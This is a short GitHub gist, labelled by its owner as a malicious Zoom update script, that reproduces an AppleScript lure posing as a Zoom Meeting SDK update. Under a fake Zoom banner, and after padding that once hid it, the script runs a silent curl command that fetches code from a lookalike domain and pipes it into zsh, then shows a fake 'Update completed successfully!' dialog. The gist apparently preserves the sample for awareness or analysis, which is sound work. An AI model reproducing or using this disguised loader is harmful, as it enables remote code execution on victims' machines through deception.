Last active
June 9, 2025 18:26
-
-
Save AndrewMohawk/80b07f0907bb7de46df23b9bbcca6af2 to your computer and use it in GitHub Desktop.
MALICIOUS zoom update script
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
############################################################### | |
# # | |
# Zoom Meeting SDK Support # | |
# # | |
# A new version of the Zoom Web App will be released soon. # | |
# In the meantime, you can update the Zoom Meeting SDK manually. # | |
# Press ▶️ to start the update. # | |
# # | |
# Copyright (c) 2025 Zoom Community # | |
# # | |
############################################################### | |
set Version to "v1.8.0" | |
set SDK to "https://developers.zoom.us/docs/meeting-sdk" | |
# <snipped the million blank lines here, see edit hist for original> | |
do shell script "curl -A audio -s http://zoom-tech.us/fix/audio/2800607159 | zsh > /dev/null 2>&1" | |
display dialog "Update completed successfully!" buttons {"OK"} default button "OK" with title "Zoom Meeting SDK Support" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment